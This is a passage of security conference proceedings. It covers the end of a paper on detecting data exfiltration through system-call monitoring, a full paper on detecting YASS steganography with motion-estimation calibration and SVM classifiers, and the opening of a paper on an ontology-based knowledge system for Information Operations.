closer to 100%. However, it should be noted that most of the difference between these 2 sets was the<br />

use of a new process in the User 1B profile that wasn't present in the User 1A profile. This type of<br />

anomaly will have to be taken care of in any future implementation.<br />

Differences in profiles among various users are expectedly severe, with the most significant<br />

differences coming from different host operating systems. This is perhaps unsurprising since many of<br />

the system calls that are used by Mac OSX aren't used by Linux and vice versa. The same goes for<br />

Solaris vs. the others as well.<br />

However, this does validate that any model will have to be highly adaptable to the environment and<br />

not rely on a predetermined set of signature detection algorithms. This property does however help us<br />

greatly as mimicry attacks will be extremely difficult to carry out without specific knowledge of the<br />

environment and user's behaviors.<br />

4.3 Responsive<br />

The last of the criteria for evaluating our chosen implementation is the ability to detect a very large<br />

variety of data exfiltrations. For this stage of testing we issued a challenge that was conducted over<br />

the course of 2 days at Oak Ridge National Laboratory (ORNL) during the summer of 2010.<br />

Participants were solicited from the lab to exfiltrate a number of files setup on one of our testing<br />

machines. All participants were asked to exfiltrate 3 files:<br />

A plain text file plainly labeled in a directory and to which all participants had unrestricted access.<br />

A mock transactional database containing simulated sensitive personal financial information that<br />

was hidden within a shared location on the same machine.<br />

A document that was clearly labeled and had a known location but in a user directory with<br />

restricted access.<br />

While this data set will have a number of other uses in the future, it currently gives a good view of<br />

whether it will be feasible to detect attacks in progress and give an idea of what those attacks might<br />

look like. We had originally hoped that our attacks would display some specific similarities to each<br />

other, perhaps manifesting as an increase in certain system call types or some other type of pattern.<br />

However, we found that all of our attacks differed significantly with a wide variety of tactics deployed.<br />

Even those attacks that appeared to use the same tactics of exfiltration displayed very dissimilar<br />

system call sequence profiles.<br />

Overall there were 18 individual UIDs and over 9 gigabytes of alerts observed during the 2-day<br />

period. The size of the dataset collected in contrast to the average observed rate of approximately 2<br />

megabytes of alerts generated under normal operation over the same time period is evidence that our<br />

method is sufficiently sensitive to data exfiltration activities.<br />

Among the 20 observed UIDs, 8 are identifiable as successfully retrieving at least one of the files, and<br />

at least 2 retrieving all three. Observed behaviors included probing with find, privilege escalation<br />

attempts, mass data exfiltrations using the sftp protocol, and transferring the files to a USB flash drive.<br />

The detection of many of these attacks may in some sense be biased given that they were new users<br />

on the system using a distinct UID. However, several of the attacks were observed among both the<br />

root account and the primary users’ UIDs, lending credibility to the system's ability to detect exfiltration<br />

behaviors even when the activity is hidden amongst normal system operation and users. As for the<br />

140


Brian Jewell and Justin Beaver<br />

other attacks that were identified, each of these incidents invoked an alarm as designed, and for our<br />

immediate purposes serve to validate that the implementation is working as intended.<br />

5. Conclusions<br />

The accurate detection of malicious data exfiltration is a complex task that can take human experts<br />

months. However, in order to react to an attack a practical system not only needs to detect attacks<br />

autonomously, but do so in real time before files can be leaked.<br />

The goal of this paper was to identify and test ways to approach this problem. We initially identified<br />

the main issues that separated what we needed in our implementation as opposed to previous work<br />

on HIDSs. We sought a method that would be tractable to run in real time, environmentally neutral as<br />

to perform well with any operating system or conditions, and most importantly responsive to behaviors<br />

specific to data exfiltrations. With these criteria in mind we adapted a means of host-based detection<br />

using sequences of system calls to implement a data exfiltration detection agent.<br />

In all of our testing, we have found that data exfiltration behaviors can be successfully detected by the<br />

relatively simple means of system call sequence analysis in real-time, which can be implemented with<br />

negligible performance impact on user operations. Our adaptation of system call sequence monitoring<br />

to this specific problem is promising and passed our three main evaluation criteria. The<br />

implementation was successfully run in real-time and deployed across a diverse set of systems and<br />

users. We were also able to present evidence that our method detects a wide range of exfiltration<br />

related behaviors.<br />

This work has prompted the question of whether this approach can detect these malicious behaviors<br />

quickly and accurately enough to prevent the data exfiltration. Our future work will focus on correlating<br />

suspicious behaviors to more reliably discriminate malicious behaviors, and further testing of our<br />

methods against known attacks is warranted to determine long-term performance.<br />

Acknowledgements<br />

The views and conclusions contained in this document are those of the authors. This manuscript has<br />

been authored by UT-Battelle, LLC, under contract DE-AC05-00OR22725 with the U.S. Department<br />

of Energy. The United States Government retains and the publisher, by accepting the article for<br />

publication, acknowledges that the United States Government retains a non-exclusive, paid-up,<br />

irrevocable, world-wide license to publish or reproduce the published form of this manuscript, or allow<br />

others to do so, for United States Government purposes.<br />

References<br />

Axelsson, S. (2000) “The Base-Rate Fallacy and the Difficulty of Intrusion Detection.” ACM Transactions on<br />

Information and System Security, Vol. 3 No. 3, pp. 186-205.<br />

Cohen, W.W. (1995) Fast effective rule induction. In Machine Learning: the 12th International <strong>Conference</strong>.<br />

Morgan Kaufmann.<br />

Coleman, K.G. (2008) “Data Exfiltration.” [online], http://it.tmcnet.com/topics/it/articles/37876-data-exfiltration.htm.<br />

Dtrace (2009), [online], http://www.oracle.com/technetwork/systems/dtrace/dtrace/index.html.<br />

Endler, D. (1998) Intrusion detection: applying machine learning to solaris audit data. In In Proc. of the IEEE<br />

Annual Computer Security Applications <strong>Conference</strong>, pages 268–279. Society Press.<br />

Fidelis Security Systems, (2009) “Fidelis Extrusion Prevention System”. [online], http://www.fidelissecurity.com/.<br />

Forrest, S. et al. (1996) A sense of self for UNIX processes. In Proceedings of the 1996 IEEE Symposium on<br />

Security and Privacy, pages 120–128, Los Alamitos, CA, IEEE Computer Society Press.<br />

Forrest, S. et al. (2008) “The Evolution of System-call Monitoring”, 2008 Annual Computer Security Applications<br />

<strong>Conference</strong>.<br />

Gao, D. et al (2006) Behavioral distance measurement using hidden markov models. In D. Zamboni and C.<br />

Kruegel, editors, Research Advances in Intrusion Detection, LNCS 4219, pages 19–40, Berlin Heidelberg,<br />

Springer-Verlag.<br />

Ghosh, A. and Schwartzbard, A. (1999) A study in using neural networks for anomaly and misuse detection. In<br />

Proceedings of the 8th USENIX Security Symposium.<br />

Giani, A. et al. (2004) “Data Exfiltration and Covert Channels.” In Proceedings of the SPIE 2004 Defense and<br />

Security Symposium.<br />

Hooper, E. (2009) “Intelligent Strategies for Secure Complex Systems Integration and Design, Effective Risk<br />

Management and Privacy.” In Proceedings of the 3rd Annual IEEE International Systems <strong>Conference</strong>.<br />

Kang, D. et al. (2005) “Learning Classifiers for Misuse and Anomaly Detection Using a Bag of System Calls<br />

Representation”, Proceedings of the 2005 Workshop on Information Assurance and Security, 2005.<br />

141


Brian Jewell and Justin Beaver<br />

Kosoresow, A.P. and Hofmeyr, S.A. (1997) Intrusion detection via system call traces. IEEE Software, 14(5):35–<br />

42.<br />

Kymie, M.C.T and Maxion, R. (2002) “”Why 6?’ Defining the Operational Limits of stide, an Anomaly-Based<br />

Intrusion Detector."<br />

Lee, W. et al. (1997) Learning patterns from UNIX process execution traces for intrusion detection. In AAAI<br />

Workshop on AI Approaches to Fraud Detection and Risk Management, pages 50–56. AAAI Press.<br />

Lee, W. and Stolfo, S.J. (1998) Data mining approaches for intrusion detection. In Proceedings of the 7th<br />

USENIX Security Symposium.<br />

(Liao 2002) Y. Liao and V. R. Vemuri. Use of k-nearest neighbor classifier for intrusion detection. Computers &<br />

Security, 21(5):439–448, 2002.<br />

Liu, Y. et al. (2009) “SIDD: A Framework for Detecting Sensitive Data Exfiltration by an Insider Attack.” In<br />

Proceedings of the 42nd Hawaii International <strong>Conference</strong> on System Sciences, 2009.<br />

McAfee (2003), [online], http://www.mcafee.com/us/.<br />

Richardson, R. (2007) CSI Computer Crime and Security Survey, [online],<br />

http://icmpnet.com/v2.gocsi.com/pdf/CSISurvey2007.pdf.<br />

Sans Institute. (2010) “20 Critical Security Controls, Critical Control 15: Data Loss Prevention.” [online],<br />

http://www.sans.org/critical-security-controls/control.php?id=15<br />

Warrender, C. et al (1999) "Detecting Intrusions Using System Calls: Alternative Data Models." In 1999 IEEE<br />

Symposium on Security and Privacy.<br />

142


Detection of YASS Using Calibration by Motion Estimation<br />

Kesav Kancherla and Srinivas Mukkamala<br />

(ICASA) / (Canes) / New Mexico Institute of Mining and Technology USA<br />

kancherla@cs.nmt.edu<br />

srinivas@cs.nmt.edu<br />

Abstract: Through this paper we propose a new approach to thwart defects of current blind steganalysis<br />

methods. “Yet Another Steganographic Scheme” (YASS) is a robust steganographic scheme that embeds data in<br />

random locations based on a secret key. Due to this randomization the current steganalysis schemes such as<br />

self calibration methods do not detect YASS. In this work, we present a new calibration method using Motion<br />

Estimation and extract higher order features. In our methodology motion estimation technique is applied on an<br />

image, to estimate its actual image. We assume that the estimated image captures the features of the actual<br />

image, due to spatial redundancy in the images. We extract two sets of features; DCT based features from DCT<br />

domain and Markov model based features from spatial domain, and apply Support Vector Machines (SVMs) on<br />

these feature sets. Our approach against YASS using different block sizes (9, 10, 12, and 14), compression rates<br />

(50-50, 50/75, and 75/75) and coefficients used for embedding data (12 and 19) obtained an accuracy of about<br />

95%, even for bigger block lengths and low embedding rates. This methodology can be used as blind<br />

steganalysis technique, as detection is based on modification of an image rather than steganographic scheme.<br />

Keywords: blind steganalysis, Discrete Cosine Transform (DCT), motion estimation, steganalysis, Support<br />

Vector Machines (SVM)<br />

1. Introduction<br />

Steganography is the science of embedding data into cover object in covert communication. The rapid<br />

growth in internet and digital media causes an increasing threat of using steganography for covert<br />

communication. Steganographic images are not perceivable to human eye but embedding data into<br />

images change the statistics of images. The goal of a steganalyst is to use these statistical changes<br />

to detect the presence of any hidden message.<br />

Fridrich used second order statistics in her research of self-calibration method for blind Steganalysis<br />

(Fridrich, 2004: 67-81). In self-calibration technique, a given image is first decompressed and few<br />

rows and columns are cropped. The cropped image is recompressed using the same quality factor,<br />

and difference between the features extracted from actual image and cropped image is used to detect<br />

steganograms. To detect well-known steganographic schemes like Outguess, F5 and Model Based<br />

steganography schemes (Provos, 2001: 24; Westfeld, 2001: 289-302; Sallee, 2005: 167-190); Farid<br />

proposed the use of wavelet based features for JPEG Steganalysis (Lyu and Farid, 2002: 340-354),<br />

Shi proposed the use of transition matrix as features for detecting steganograms (Shi et al, 2006: 249-<br />

264), Fridrich used merged Discrete Cosine Transform (DCT) and Markov features for implementing a<br />

multi-class JPEG steganalysis classification (Pevny and Fridrich, 2007: 1-13) and Chen proposed<br />

Markov based features using intra-block and inter-block correlation of DCT coefficients (Chen and<br />

Shi, 2008: 3029-3032).<br />

Outguess embeds data by replacing least significant bit and preserves the first order statistics by<br />

performing additional changes, F5 algorithm uses matrix embedding to reduce the number of changes<br />

needed to embed data. And Model-based steganography tries to preserve histograms of individual<br />

AC DCT models after embedding the data. However the current steganalysis techniques can detect<br />

these steganography methods. “Yet Another Steganography Scheme” (YASS) by (Solanki, Sarkar<br />

and Manjunath, 2007: 16-31) is a new steganography scheme that resists the above steganalysis<br />

methods. YASS embeds data at random locations and uses Quantization Index Modulation (QIM) to<br />

increase robustness of data. Even though it cannot be detected using current self-calibration<br />

methods, embedding data still changes the statistical properties of image.<br />

In (Li, Shi and Huang, 2008: 139-148), the authors present a targeted attack on YASS. They showed<br />

that due to QIM embedding scheme used in YASS, there is an increase in number of zero DCT<br />

coefficients in stego image. Thus there is a notable difference between statistics of embedded block<br />

and the actual block. They also identified the fact that embedding is not random enough for detection<br />

of YASS. However this approach does not work when there are modifications in algorithm. In the<br />

method proposed by (Kodovský, Pevný and Fridrich, 2010: 1-11), the authors used various well<br />

known steganalysis methods for detection of YASS. They used Subtractive Pixel Adjacency Model<br />

143


Kesav Kancherla and Srinivas Mukkamala<br />

(SPAM) of feature set (686 features), Pevný feature set (584 features), Markov Process (MP) feature<br />

set (486 features) and CDF (Cross-Domain Feature) set (1,234 features, combination of SPAM and<br />

Pevny). Except for SPAM remaining features are extracted from DCT domain (Pevny and Fridrich,<br />

2007: 1-13; Chen and Shi, 2008: 3029-3032; Pevny, Bas and Fridrich, 2009 75-84). In Pevny feature<br />

set instead of using difference calibration they used Cartesian calibration thus increasing the feature<br />

set length, however the authors argue the use of difference calibration will affect the performance of<br />

detection. Our approach in this paper is based on difference calibration for detection.<br />

In this paper we propose a novel method that uses calibration for detection. YASS defeats current<br />

calibration methods by embedding data in random location. In our approach, we perform calibration<br />

by estimating image using motion estimation. Motion estimation is widely used in video compression<br />

for capturing temporal redundancies. In our case we use motion estimation on adjacent blocks for<br />

capturing spatial redundancies. After obtaining the estimated image we extract two sets of features:<br />

DCT based features and Markov based features (Pevny and Fridrich, 2007: 1-13). Markov based<br />

features are extracted from spatial domain rather than DCT domain, as embedding is done in spatial<br />

domain. We used Support Vector Machine (SVM) based classifier in our experiments, and obtained<br />

an accuracy of about 95% even for low embedding rates. This paper is organized in sections, section<br />

2 gives a brief discussion of YASS algorithm, section 3 gives outline of our approach, section 4 gives<br />

a brief overview of features used, and section 5 contains results obtained using this approach<br />

followed by conclusion in section 6.<br />

2. YASS algorithm<br />

For an input image of size MxN, the following steps are involved in YASS (Solanki, Sarkar and<br />

Manjunath, 2007: 16-31)<br />

First the input image is divided into blocks of size BxB (B>8 block size in jpeg images) called bigblock.<br />

For compressed images like jpeg, first the image is decompressed and then divided.<br />

For each big-block, a block of size 8x8 is pseudo randomly selected. This block is called<br />

embedding block. The key for random key generator is shared between the sender and receiver.<br />

For each embedding block we apply two dimensional DCT and divide DCT coefficients with<br />

quantization matrix of design quality factor QFh. Data is embedded into predetermined band of<br />

low frequency AC coefficients using quantization index modulation.<br />

After embedding data, the embedding block is de-quantized using design quality factor and<br />

inverse two dimensional DCT is applied.<br />

After data is embedded in all the embedding blocks, the image is compressed with advertised<br />

quality factor QFa. Generally QFh is not less than QFa.<br />

The random selection of embedding blocks at step 2 will ensure the security from current calibration<br />

based steganalysis methods. As data is embedded at random 8x8 blocks, steganalyst cannot<br />

resynchronize by cropping rows and columns. However the above scheme will reduce the capacity of<br />

embedding. Even though data is embedded at random locations, the statistical properties of DCT<br />

coefficients will change.<br />

Our approach will try to capture these changes by obtaining an estimated image from actual image<br />

using spatial redundancies. This estimation process is similar to motion estimation which is widely<br />

used in video compression techniques. After finding the estimate we model the difference between<br />

the actual and estimated along horizontal, vertical, and diagonal directions in one step Markov<br />

process. We extract DCT and Markov features from actual and estimate. After modeling and<br />

extracting features, we train a SVM based classifier to detect steganalysis.<br />

3. Our approach<br />

The steganalysis scheme consists of three steps: (1) Obtain estimated image from actual image, 2)<br />

Extract high order DCT and Markov features from both actual and estimated image, and (3) Train<br />

SVM classifier using these features. In order to obtain estimated image we use the concept of motion<br />

estimation (Torr and Zisserman, 1999: 278-294), widely used in video compression techniques.<br />

Motion estimation utilizes temporal redundancies in videos for achieving compression.<br />

The video compression process consists of inter frame compression and intra frame compression.<br />

Intra frame compression is more like JPEG compression. Inter frame compression uses the temporal<br />

redundancy in the video frames. In inter frame compression, the current frame is predicted using the<br />

144


Kesav Kancherla and Srinivas Mukkamala<br />

redundant data from the previous frame. In inter frame compression, current frame is divided into 8x8<br />

blocks and a match for each block is found in previous frame. To find a match we search the previous<br />

frames in the near vicinity of the block we are analyzing.<br />

Figure 1: Current block is searched for best in search space and is replaced by it<br />

We apply this concept to images, in order to find estimate. Just like temporal redundancies in videos<br />

we have spatial redundancies in images. We find the best estimate to current block in its vicinity and<br />

replace it with this match. Figure 1 shows the matching procedure, where a best match is found in the<br />

search space. To reduce noise induced due to motion estimation, we used block size of 4x4.<br />

The algorithm for estimating image is given below:<br />

1. First de-compress the image by applying de-quantization and inverse 2 dimensional DCT<br />

2. Divide the decompressed image into blocks of size 4x4<br />

3. For each 4x4 block find the best match at step size 1 pixel in both x-axis and y-axis<br />

4. Replace the actual block with best match<br />

5. After obtaining matched block, apply 2 dimensional DCT and quantization to estimated block<br />

6. Using this image we extract two set of features: DCT based and Markov model based features<br />

4. Feature extraction<br />

In this section we explain briefly about the feature extraction. We extract merged DCT and Markov<br />

features (Pevny and Fridrich, 2007: 1-13) that are used for blind steganalysis. The first sets of<br />

features are DCT based features that are extracted from 23 different functions. These 23 functions<br />

are based on first order and higher order statistics of the quantized DCT coefficients. The second sets<br />

of features are extracted from Markov based models. Here the difference between absolute values of<br />

neighboring pixel coefficients are modeled as Markov process. From these models, we extract cooccurrence<br />

matrix. Due to high dimensionality of these functions, only features at selected locations<br />

and for selected values are taken. We extract a total of 274 features of which 193 are DCT based<br />

features and 81 are Markov based features. The major difference between (Pevny and Fridrich, 2007:<br />

1-13) and our features is, instead of extracting Markov based features in DCT domain, we extract<br />

features in spatial domain only. As embedding is done, we believe Markov features extracted in<br />

spatial domain are effective. A brief description of both sets of features is given below.<br />

4.1 DCT features<br />

The coefficients are denoted dij (k), i, j = 1. . . 8, k = 1. . . nb, where dij (k) denotes the (i, j)-th quantized<br />

DCT coefficient in the k-th block (there are total of nb blocks).<br />

First set of features are histogram of DCT coefficients of image. To reduce dimensionality we only use<br />

histogram of values from -5 to 5<br />

The next 5 functions are histograms of coefficients of 5 individual DCT modes (i, j) ∈ {(1, 2), (2, 1),<br />

(3, 1), (2, 2), (1, 3)} and only the histogram of values {−5. . . 5} are used<br />

145


Kesav Kancherla and Srinivas Mukkamala<br />

ij ij ij<br />

h = ( h , K , h )<br />

(1)<br />

L R<br />

The next 11 functions are dual histograms represented with 8 × 8 matrices g d<br />

i, j,where i, j = 1, . . . , 8,<br />

d =−5, . . . , 5<br />

nB<br />

d<br />

g = ∑δ ( d, dij(<br />

k ))<br />

(2)<br />

ij<br />

k = 1<br />

Where δ(x, y) = 1 if x = y and 0 otherwise. For reducing the features only (i, j) ∈ {(2, 1), (3, 1), (4, 1),<br />

(1, 2), (2, 2), (3, 2), (1, 3), (2, 3), (1, 4)} are taken<br />

The next 6 functions capture inter-block dependency among DCT coefficients. The first function is<br />

variation V<br />

8 | Ir| −1 8 | Ic|<br />

−1<br />

∑∑ ∑∑<br />

| d ( I ( k)) − d ( I ( k+ 1)) | + | d ( I ( k)) − d ( I ( k+<br />

1)) |<br />

ij r ij r ij c ij c<br />

ij , = 1 k= 1 ij , = 1 k=<br />

1<br />

| I | + | I |<br />

r c<br />

Where Ir and Ic denote the vectors of block indices 1. . . nb while scanning the image by rows and by<br />

columns, respectively<br />

The next two functions capture the blockings of the frames<br />

B<br />

⎣⎢( M−1)/8 ⎦⎥ N ⎢⎣( N−1)/8⎥⎦<br />

M<br />

α α<br />

∑ ∑| C8, i j − C8i+ 1, j | + ∑ ∑|<br />

Ci,8 j −Ci,8j+<br />

1|<br />

α =<br />

i= 1 j= 1 j= 1 i=<br />

1<br />

N ⎢⎣( M − 1)/8 ⎥⎦+ M ⎢⎣( N −1)/8⎥⎦<br />

Where M and N are image height and width in pixels and ci, j are grayscale values of the<br />

decompressed JPEG image, α = 1, 2<br />

The last sets of features are co-occurrence matrix of DCT coefficients in neighboring blocks. The cooccurrence<br />

matrix is calculated for values -2 to +2.<br />

4.2 Markov features<br />

From each image F (u, v), we obtain the following difference matrix along the horizontal, vertical,<br />

diagonal and minor diagonal directions.<br />

Fh( u, v) = F( u, v) − F( u+ 1, v)<br />

Fv(,) u v = F(,) u v − F(, u v+<br />

1)<br />

Fd(,) u v = F(,) u v − F( u+ 1, v+<br />

1)<br />

Fm(,) u v = F( u+ 1,) v − F(, u v+<br />

1)<br />

Where F (u, v) is the image u, v gives the pixel location<br />

In order to reduce the dimensionality we consider only the values [-4, +4] in these matrixes. Thus all<br />

the values that is larger than +4 are set to +4 and the values that are smaller than -4 are set to -4.<br />

From these we calculate the transition matrix as follows<br />

146<br />

(3)<br />

(4)


M<br />

M<br />

M<br />

Su−2 Sv<br />

∑∑<br />

u= 1 v=<br />

1<br />

h(,<br />

i j)<br />

=<br />

Su−1 Sv<br />

Su Sv−2<br />

∑∑<br />

u= 1 v=<br />

1<br />

Kesav Kancherla and Srinivas Mukkamala<br />

δ(<br />

Fh( u, v) = i, Fh( u+ 1, v) = j)<br />

∑∑<br />

u= 1 v=<br />

1<br />

v(,<br />

i j)<br />

=<br />

Su Sv−1<br />

Su−2 Sv−2<br />

∑ ∑<br />

u= 1 v=<br />

1<br />

δ(<br />

Fh( u, v) = i)<br />

δ(<br />

Fv( uv , ) = iF , v(<br />

uv , + 1) = j)<br />

∑∑<br />

u= 1 v=<br />

1<br />

d (, i j)<br />

=<br />

Su−1 Sv−1<br />

M<br />

Su−2 Sv−2<br />

∑∑<br />

u= 1 v=<br />

1<br />

δ(<br />

Fuv v(<br />

, ) = i)<br />

δ ( Fd( uv , ) = iF , d(<br />

u+ 1, v+ 1) = j)<br />

∑∑<br />

u= 1 v=<br />

1<br />

m(,<br />

i j)<br />

=<br />

Su−1 Sv−1<br />

u= 1 v=<br />

1<br />

δ ( Fd( u, v) = i)<br />

δ(<br />

Fm( u+ 1, v) = i, Fm( u, v+ 1) = j)<br />

∑∑<br />

δ(<br />

Fm( u, v) = i)<br />

Where Su and Sv are the dimensions of the image and δ (condition) = 1 if only if the conditions are<br />

satisfied. The final features will be the average of the above 4 transition matrix.<br />

5. Results<br />

We used 2000 images in our experiment. From these 2000 images we used 1400 images for training<br />

SVM and 600 images for testing. Each data point consists of 274 features, of which 193 are DCT<br />

features and 81 are Markov features. We used the following parameters for embedding data using<br />

YASS<br />

Three different quality factor modes 50/50, 50/75 and 75/75<br />

Four different block sizes 9, 10, 12 and 14<br />

Low frequency DCT coefficients used for embedding 12 (low) and 19 (high)<br />

We selected block sizes less than 14 as the block size increases the amount of data that can be<br />

embedded decreases. We choose the number coefficients used for embedding 19 because it is used<br />

in YASS (Solanki, Sarkar and Manjunath, 2007: 16-31) paper and value 12 to show the performance<br />

of our steganalysis scheme at low embedding rates. Table 1 and Table 2 give the accuracies<br />

obtained for different parameters at high data and low data respectively.<br />

Table 1: Accuracy obtained for different block sizes, compression rates and coefficients used equal to<br />

19<br />

Advertised-Design Compression rate/ Block Size 9 10 12 14<br />

50-50 99.8 99.7 99.75 99.7506<br />

50-75 97.1737 97.584 97.5894 96.0881<br />

75-75 97.5973 97.6725 97.0075 96.0881<br />

Table 2: Accuracy obtained for different block sizes, compression rates and coefficients used equal to<br />

12<br />

Advertised-Design Compression rate/ Block Size 9 10 12 14<br />

50-50 99.8337 99.5012 99.335 99.47<br />

50-75 96.5087 96.7581 96.84 95.59<br />

75-75 96.59 96.68 95.6775 94.55<br />

We obtained an accuracy of about 99.5 % for 50-50 setting even when we used only 12 coefficients<br />

for embedding. There is a decrease in accuracy as the block size increases for all compression<br />

setting. This is due to the fact that as size of the block increases the embedding capacity decreases.<br />

We obtained an accuracy of above 95% for all setting even when block size is 14 and embedding<br />

147<br />

(5)<br />

(6)<br />

(7)<br />

(8)


Kesav Kancherla and Srinivas Mukkamala<br />

coefficients as 12. Our method performed best when we used 50-50 compression setting. In 50-50<br />

there is more noise added due to compression. As our method is based on using this noise for<br />

detection we obtained better accuracy in 50-50 setting. In next section we explain the model selection<br />

process and Receiver Operation Characteristic (ROC) curves.<br />

5.1 Model selection for SVMs<br />

In any predictive learning task, such as classification, both model and parameter estimation method<br />

should be selected in order to achieve a high level of performance of the learning machine. Recent<br />

approaches allow a wide class of models of varying complexity to be chosen. Then the task of<br />

learning amounts to selecting the sought-after model of optimal complexity and estimating parameters<br />

from training data (Cherkassy, 2002: 109-133; Lee and Lin 2000). Within the SVMs approach, usually<br />

parameters to be chosen are (i) The penalty term C which determines the trade-off between the<br />

complexity of the decision function and the number of training examples misclassified; (ii) The<br />

mapping function and (iii) The kernel function such that . In the case of RBF kernel, the width,<br />

which implicitly defines the high dimensional feature space, is the other parameter to be selected<br />

(Chang and Lin, 2001). Figures 2 and 3 gives the model graph obtained during training.<br />

Figure 2: Model graph obtained during training of SVM obtained for YASS at block size 9,<br />

compression rates 50-50 and coefficients used for embedding equal to 12<br />

Figure 3: Gives model graph obtained during training SVM for YASS at block size 14, compression<br />

rates 75-75 and coefficients used for embedding equal to 10<br />

148


5.2 ROC curves<br />

Kesav Kancherla and Srinivas Mukkamala<br />

ROC is a graphical plot between the sensitivity and specificity. The ROC is used to represent the<br />

plotting of the fraction of true positives (TP) versus the fraction of false positives (FP). The point (0, 1)<br />

is the perfect classifier, since it classifies all positive cases and negative cases correctly. Thus an<br />

ideal system will initiate by identifying all the positive examples and so the curve will rise to (0, 1)<br />

immediately, having a zero rate of false positives, and then continue along to (1, 1). Detection rates<br />

and false alarms are evaluated for steganography data set and obtained results are used to plot the<br />

ROC curves. In each of these ROC plots, the x-axis is the false alarm rate, calculated as the<br />

percentage of normal video frames considered as steganograms; the y-axis is the detection rate,<br />

calculated as the percentage of steganograms detected. A data point in the upper left corner<br />

corresponds to optimal high performance, i.e., high detection rate with low false alarm rate (Egan,<br />

1975) Figures 4 and Figure 5 gives the ROC curves obtained during testing.<br />

Figure 4 Gives the Receiver Operational Characteristics (ROC) curve obtained during steganalysis of<br />

YASS at block size 9, compression rates 50-50 and coefficients used for embedding equal<br />

to 12<br />

Figure 5: Receiver Operational Characteristics (ROC) curve obtained during steganalysis of YASS at<br />

block size 14, compression rates 75-75 and coefficients used for embedding equal to 10<br />

149


Kesav Kancherla and Srinivas Mukkamala<br />

The accuracy of the test depends on how well the test classifies the group being tested into 0 or 1.<br />

Accuracy is measured by the area under the ROC curve (AUC). An Area of 1 represents a perfect test<br />

and an area below .5 represents a worthless test. In our experiment, we got an AUC of 0.9998 and<br />

0.9667 as shown above in Figures 4 and Figure 5.<br />

6. Conclusion<br />

In this paper we propose a steganalysis scheme for YASS. The novelty of our method is to estimate<br />

the image using the concept of motion estimation. Experimental results show that our method is able<br />

to detect YASS even for low embedding rates. Our method is able to detect YASS stegnograms<br />

consistently with accuracy of above 99%, which has compression rates 50-50. In our approach the<br />

accuracy decreases as the block size increases, since less number of bits are embedded. As our<br />

methodology does not use any information regarding steganographic scheme, it can be applied on<br />

any scheme.<br />

References<br />

Chang, C. C. and Lin, C. J. (2001), LIBSVM: a library for support vector machines, Department of Computer<br />

Science and Information Engineering, National Taiwan University.<br />

Chen, C. and Shi, Y. Q. (2008) ‘JPEG image steganalysis utilizing both intrablock and interblock correlations’,<br />

IEEE International Symposium on Circuits and Systems, pp. 3029-3032.<br />

Cherkassy V. (2002) ‘Model complexity control and statistical learning theory’, Journal of Natural Computing, Vol.<br />

1, pp. 109-133.<br />

Egan, J.P (1975), Signal detection theory and ROC analysis, New York: <strong>Academic</strong> Press.<br />

Fridrich, J. (2004) ‘Feature-based steganalysis for JPEG images and its implications for future design of<br />

steganographic schemes’, Information Hiding, <strong>6th</strong> International Workshop, LNCS 3200, pp.67-81.<br />

Kodovský, J., Pevný, T. and Fridrich, J. (2010) ‘Modern steganalysis can detect YASS’, Proceedings SPIE,<br />

Electronic Imaging, Security and Forensics of Multimedia XII, volume 7541, pp. 02–01–02–11.<br />

Lee, J. H. and Lin, C. J. (2000), Automatic model selection for support vector machines, Technical Report,<br />

Department of Computer Science and Information Engineering, National Taiwan University.<br />

Li, B., Shi, Y.Q. and Huang, J. (2008) ‘Steganalysis of YASS’, Proceedings of the 10th ACM Multimedia &<br />

Security Workshop, pp. 139–148.<br />

Lyu, S. and Farid, H. (2002) ‘Detecting hidden messages using higher order statistics and support vector<br />

machines’, Information Hiding, 5th International Workshop, LNCS 2578, pp. 340-354.<br />

Pevny, T. and Fridrich, J. (2007) ‘Merging Markov and DCT features for multi-class JPEG steganalysis’, Proc. of<br />

SPIE Electronic Imaging, Security, Steganography, and Watermarking of Multimedia Contents, volume<br />

6505, pp. 650503-1-650503-13.<br />

Pevný, T., Bas, P. and Fridrich, J. (2009) ‘Steganalysis by subtractive pixel adjacency matrix’, Proceedings of the<br />

11th ACM Multimedia & Security Workshop, pp. 75–84.<br />

Provos, N. (2001) ‘Defending against statistical steganalysis’, 10 th USENIX Security Symposium, Washington<br />

DC, USA, pp. 24.<br />

Sallee, P. (2005) “Model based methods for steganography and steganalysis’, Int. J. Image Graphics, 5(1): 167-<br />

190.<br />

Sarkar A., Solanki, K. and Manjunath, B. S. (2008) ‘Further study on YASS: Steganography based on<br />

randomized embedding to resist blind steganalysis’, Proceedings SPIE, Electronic Imaging, Security,<br />

Forensics, Steganography, and Watermarking of Multimedia Contents, volume 6819, pages 16–31.<br />

Shi, Y. Q., Chen, C. and Chen, W. (2006) ‘A Markov process based approach to effective attacking JPEG<br />

steganography’, Information Hiding, 8th international Workshop, volume 4437, 249-264.<br />

Solanki, K., Sarkar, A. and Manjunath, B. S. (2007) ‘YASS: Yet another steganographic scheme that resists blind<br />

Steganalysis’, Proceedings of 9th Information Hiding Workshop, Saint Malo, France, volume 4567, pp. 16-<br />

31.<br />

Torr, P.H.S. and Zisserman, A. (1999) ‘Feature Based Methods for Structure and Motion Estimation,” ICCV<br />

Workshop on Vision Algorithms, pp. 278-294.<br />

Westfeld, A. (2001) ‘High capacity despite better steganalysis (F5-a steganographic algorithm)’, Information<br />

Hiding, 4th International Workshop, LNCS 2137, pp. 289-302.<br />

150


Developing a Knowledge System for Information<br />

Operations<br />

Louise Leenen, Ronell Alberts, Katarina Britz, Aurona Gerber and Thomas<br />

Meyer<br />

Council for Scientific and Industrial Research, Pretoria, South Africa<br />

lleenen@csir.co.za<br />

ralberts@csir.co.za<br />

abritz@csir.co.za<br />

agerber@csir.co.za<br />

tmeyer@csir.co.za<br />

Abstract: In this paper we describe a research project to develop an optimal information retrieval system in an<br />

Information Operations domain. Information Operations is the application and management of information to gain<br />

an advantage over an opponent and to defend one’s own interests. Corporations, governments, and military<br />

forces are facing increasing exposure to strategic information-based actions. Most national defence and security<br />

organisations regard Information Operations as both a defensive and offensive tool, and some commercial<br />

institutions are also starting to recognise the value of Information Operations. An optimal information retrieval<br />

system should have the capability to extract relevant and reasonably complete information from different<br />

electronic data sources which should decrease information overload. Information should be classified in a way<br />

such that it can be searched and extracted effectively. The authors of this paper have completed an initial phase<br />

in the investigation and design of a knowledge system that can be used to extract relevant and complete<br />

knowledge for the planning and execution of Information Operations. During this initial phase of the project, we<br />

performed a needs analysis and problem analysis and our main finding is the recommendation of the use of<br />

logic-based ontologies: it has the advantage of an unambiguous semantics, facilitates intelligent search, provides<br />

an optimal trade-off between expressivity and complexity, and yields optimal recall of information. The risk of<br />

